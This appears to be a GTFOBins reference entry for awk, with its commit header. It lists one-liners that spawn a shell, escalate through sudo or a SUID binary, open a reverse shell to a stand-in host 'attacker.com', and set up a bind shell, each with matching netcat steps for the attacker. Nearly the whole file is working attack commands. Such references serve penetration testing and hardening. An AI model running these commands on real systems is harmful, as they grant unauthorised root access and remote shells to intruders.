GTFOBins.github.io/_gtfobins/awk.md
Andrea Cardaci e885d4a6ee Remove the -p option from suid-limited
It is useless because:
- if Debian-like, it is not supported and does not drop anyway;
- otherwise the `system()`-like function already used a shell that dropped the
  privileges.
2018-05-25 00:57:42 +02:00

27 lines
1013 B
Markdown

---
functions:
exec-interactive:
- code: awk 'BEGIN {system("/bin/sh")}'
sudo-enabled:
- code: sudo awk 'BEGIN {system("/bin/sh")}'
suid-limited:
- code: ./awk 'BEGIN {system("/bin/sh")}'
reverse-shell-non-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
RHOST=attacker.com
RPORT=12345
awk -v RHOST=$RHOST -v RPORT=$RPORT 'BEGIN {
s = "/inet/tcp/0/" RHOST "/" RPORT;
while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
bind-shell-non-interactive:
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
code: |
LPORT=12345
awk -v LPORT=$LPORT 'BEGIN {
s = "/inet/tcp/" LPORT "/0/0";
while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
---